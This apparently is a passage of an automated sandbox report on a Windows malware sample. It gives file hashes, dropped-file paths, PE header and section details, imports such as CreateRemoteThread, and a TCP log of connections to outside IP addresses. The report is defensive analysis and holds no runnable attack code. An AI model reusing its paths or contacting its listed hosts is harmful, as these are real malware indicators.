                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):9062
                                                                                                        Entropy (8bit):3.1625951749021364
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z2+h:j+s+v+b+P+m+0+Q+q+9+h
                                                                                                        MD5:44A7B0493CF5DB2EA4B3AA98E369F59D
                                                                                                        SHA1:60322A1984D18CEB3F7105F9086584FFAEEDBBC5
                                                                                                        SHA-256:4248B10ADC263B0A71E1458C5A950B9387DFD5124DD8B91928684262E1DABF11
                                                                                                        SHA-512:7081E092B955DEEA6B1BCF1504EF3812A1ABF0A33BF13F33B8BBBA8ACF22941288A7BA0A9CF5F6E50BFFE52CDF60670A9DB3AC5E18E87BFA296367E8EAF4FD1A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220115_042221_285.etl
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8192
                                                                                                        Entropy (8bit):3.318412811253484
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:jC/C42o+WK5Su912YnmC0vI2lXSk4P4mlT2WYFzqUMCv6JRW:2YtkyX2YvnCAw
                                                                                                        MD5:EFF2FE31D906DBDDEC1625C346AC4F99
                                                                                                        SHA1:C265CAF999BC43A36D61FB235CDFE77C1AB4916D
                                                                                                        SHA-256:2EB779DDF0FD27ED793FBA33F606DDDEA5CAC283DA2810E3932B43E6F3347DFB
                                                                                                        SHA-512:897D7F6E59C9041C5DB3FC1975382F61B4465CBD6BEA91198238EF0BDEC2064794F2C7BBD77725F75E38E1504617227262CAFF5186AD96E1384F7EC2E583730E
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: .... ... ....................................... ...!............................................................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ......PR}............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.5._.0.4.2.2.2.1._.2.8.5...e.t.l.........P.P.................................................................................................................................................................................................................................................................................
                                                                                                        C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)
                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11619840
                                                                                                        Entropy (8bit):3.8195691800841227
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:rxPbeuhFMQH+prd0WRRa/CMjXOfo68JRD0QsGrnyspaaaaaaaaaaaaaaaaaaaaaH:rPTWRRZM+fuJR5sG
                                                                                                        MD5:673D618D671523049906C3308A9AAD4F
                                                                                                        SHA1:D0ED8C79559CE9000A8196E62B127E40A8C61CB7
                                                                                                        SHA-256:5D2E5FFDA32AC3FEEA1526B4F05363B6F1994F18C1F27993FED00ACD4FCF7C88
                                                                                                        SHA-512:57622653554190523F7BFC4C127B33974335D3C8B98C041940545B9AEF53C69555D7E858542FCA08441EF6350B9D2E5926C97C70623783C8848DE0789FE65DE8
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...i.`..........................................@.................................s...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....mekafe.............................@....tuxu...............................@....hawoz..............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.6829606926024825
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:ZA3cYU28Yl.exe
                                                                                                        File size:320000
                                                                                                        MD5:679831cf1f00950b4adffbbba7e6ab46
                                                                                                        SHA1:f4aa59829222d5ed000849ea0167082f54b59e03
                                                                                                        SHA256:760d44ea1a90c1b235133258a8f03bed049b5b51328aefe4a2595b6f085dd99d
                                                                                                        SHA512:5d88bc6fa746628f9eb792612b857d7724da4827445edf2a7850190358a3c9c08caa602df2cc92eba96571d4c34a0e311007c8688fa437203f8eec3185c2ed8f
                                                                                                        SSDEEP:6144:+/jCnwGXFliTnwC2aJLQt55gPnHswDcEgoJgnyyB:+/jZR2GK7g/swdgoiF
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,...~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`...........................

                                                                                                        File Icon

                                                                                                        Icon Hash:c8d0d8e0f0e0f4e0

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x41b290
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                        Time Stamp:0x602EA3B5 [Thu Feb 18 17:28:21 2021 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:6801e04a0c2ca60ac2497c0d8723846b

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        mov edi, edi
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        call 00007FED28AEE81Bh
                                                                                                        call 00007FED28AE1796h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        mov edi, edi
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push FFFFFFFEh
                                                                                                        push 0043D888h
                                                                                                        push 0041E470h
                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                        push eax
                                                                                                        add esp, FFFFFF94h
                                                                                                        push ebx
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        mov eax, dword ptr [00440354h]
                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                        xor eax, ebp
                                                                                                        push eax
                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                        push eax
                                                                                                        call dword ptr [0040109Ch]
                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                        jmp 00007FED28AE17A8h
                                                                                                        mov eax, 00000001h
                                                                                                        ret
                                                                                                        mov esp, dword ptr [ebp-18h]
                                                                                                        mov dword ptr [ebp-78h], 000000FFh
                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                        mov eax, dword ptr [ebp-78h]
                                                                                                        jmp 00007FED28AE18D7h
                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                        call 00007FED28AE1914h
                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                        push 00000001h
                                                                                                        call 00007FED28AEF1FAh
                                                                                                        add esp, 04h
                                                                                                        test eax, eax
                                                                                                        jne 00007FED28AE178Ch
                                                                                                        push 0000001Ch
                                                                                                        call 00007FED28AE18CCh
                                                                                                        add esp, 04h
                                                                                                        call 00007FED28AEA874h
                                                                                                        test eax, eax
                                                                                                        jne 00007FED28AE178Ch
                                                                                                        push 00000010h

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2008 build 21022
                                                                                                        • [IMP] VS2005 build 50727
                                                                                                        • [ASM] VS2008 build 21022
                                                                                                        • [LNK] VS2008 build 21022
                                                                                                        • [RES] VS2008 build 21022
                                                                                                        • [C++] VS2008 build 21022

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3dfb40x50.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x8728.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1590000x1e00.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x13a00x1c.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91000x40.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x34c.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x3e36e0x3e400False0.581129204317data6.95926809019IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .data0x400000x10c9880x1800False0.3408203125data3.46519187176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .wumened0x14d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .kilohe0x14e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .putohox0x14f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x1500000x87280x8800False0.595042509191data5.83826747573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x1590000x465a0x4800False0.344672309028data3.68878313517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                        AFX_DIALOG_LAYOUT0x1570480x2dataDutchNetherlands
                                                                                                        AFX_DIALOG_LAYOUT0x1570400x2dataDutchNetherlands
                                                                                                        AFX_DIALOG_LAYOUT0x1570500x2dataDutchNetherlands
                                                                                                        AFX_DIALOG_LAYOUT0x1570580x2dataDutchNetherlands
                                                                                                        CIDAFICUDUROSOTAROM0x1566280x6c7ASCII text, with very long lines, with no line terminatorsAssameseIndia
                                                                                                        VIDIWAYAPENIGU0x156cf00x2faASCII text, with very long lines, with no line terminatorsAssameseIndia
                                                                                                        RT_CURSOR0x1570600x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                                        RT_ICON0x1507400x6c8dataAssameseIndia
                                                                                                        RT_ICON0x150e080x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                        RT_ICON0x1513700x10a8dataAssameseIndia
                                                                                                        RT_ICON0x1524180x988dBase III DBT, version number 0, next free block index 40AssameseIndia
                                                                                                        RT_ICON0x152da00x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                        RT_ICON0x1532580x8a8dataAssameseIndia
                                                                                                        RT_ICON0x153b000x6c8dataAssameseIndia
                                                                                                        RT_ICON0x1541c80x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                        RT_ICON0x1547300x10a8dataAssameseIndia
                                                                                                        RT_ICON0x1557d80x988dataAssameseIndia
                                                                                                        RT_ICON0x1561600x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                        RT_STRING0x1579200xe4dataDutchNetherlands
                                                                                                        RT_STRING0x157a080x3bcdataDutchNetherlands
                                                                                                        RT_STRING0x157dc80x6e6dataDutchNetherlands
                                                                                                        RT_STRING0x1584b00x1a0dataDutchNetherlands
                                                                                                        RT_STRING0x1586500xd8dataDutchNetherlands
                                                                                                        RT_ACCELERATOR0x1570000x10dataDutchNetherlands
                                                                                                        RT_ACCELERATOR0x156ff00x10dataDutchNetherlands
                                                                                                        RT_GROUP_CURSOR0x1579080x14dataDutchNetherlands
                                                                                                        RT_GROUP_ICON0x1532080x4cdataAssameseIndia
                                                                                                        RT_GROUP_ICON0x1565c80x5adataAssameseIndia
                                                                                                        None0x1570200xadataDutchNetherlands
                                                                                                        None0x1570300xadataDutchNetherlands
                                                                                                        None0x1570100xadataDutchNetherlands

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllDeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
                                                                                                        USER32.dllOemToCharA
                                                                                                        ADVAPI32.dllGetFileSecurityA

                                                                                                        Possible Origin

                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        DutchNetherlands
                                                                                                        AssameseIndia

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 14, 2022 20:22:59.915405035 CET4975680192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:22:59.932780981 CET80497568.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:22:59.932898998 CET4975680192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:22:59.933075905 CET4975680192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:22:59.933120012 CET4975680192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:22:59.950341940 CET80497568.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.055650949 CET80497568.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.057493925 CET4975680192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.058983088 CET4975680192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.076292038 CET80497568.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.404334068 CET4975780192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.421559095 CET80497578.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.421799898 CET4975780192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.421926022 CET4975780192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.421966076 CET4975780192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.439035892 CET80497578.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.540153980 CET80497578.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.540256023 CET4975780192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.540298939 CET4975780192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.557435036 CET80497578.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.573101044 CET4975880192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.590307951 CET80497588.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.590866089 CET4975880192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.590945005 CET4975880192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.590986013 CET4975880192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.608042002 CET80497588.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.710645914 CET80497588.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:00.712507963 CET4975880192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.712786913 CET4975880192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:00.729913950 CET80497588.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.049292088 CET4975980192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.066797972 CET80497598.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.067893028 CET4975980192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.068022966 CET4975980192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.068043947 CET4975980192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.085340977 CET80497598.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.216824055 CET80497598.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.216870070 CET80497598.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.216945887 CET4975980192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.217155933 CET4975980192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.234585047 CET80497598.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.245455980 CET4976080192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.262906075 CET80497608.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.266944885 CET4976080192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.267034054 CET4976080192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.269104004 CET4976080192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.284406900 CET80497608.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.286267996 CET80497608.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.391875982 CET80497608.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.391916037 CET80497608.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.391983032 CET4976080192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.392239094 CET4976080192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.409379005 CET80497608.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.749423027 CET4976180192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.766803980 CET80497618.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.766980886 CET4976180192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.767085075 CET4976180192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.767092943 CET4976180192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.784375906 CET80497618.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.884358883 CET80497618.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.884380102 CET80497618.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.884459972 CET4976180192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.884685040 CET4976180192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:01.891863108 CET4976280192.168.2.3185.186.142.166
                                                                                                        Jan 14, 2022 20:23:01.901845932 CET80497618.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:01.947247982 CET8049762185.186.142.166192.168.2.3
                                                                                                        Jan 14, 2022 20:23:02.447870970 CET4976280192.168.2.3185.186.142.166
                                                                                                        Jan 14, 2022 20:23:02.503247976 CET8049762185.186.142.166192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.010678053 CET4976280192.168.2.3185.186.142.166
                                                                                                        Jan 14, 2022 20:23:03.066276073 CET8049762185.186.142.166192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.391731024 CET4976380192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.409066916 CET80497638.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.409514904 CET4976380192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.409595013 CET4976380192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.409607887 CET4976380192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.426898003 CET80497638.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.529458046 CET80497638.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.529834986 CET4976380192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.530078888 CET4976380192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.547358990 CET80497638.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.857891083 CET4976480192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.875294924 CET80497648.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.875619888 CET4976480192.168.2.38.209.70.0
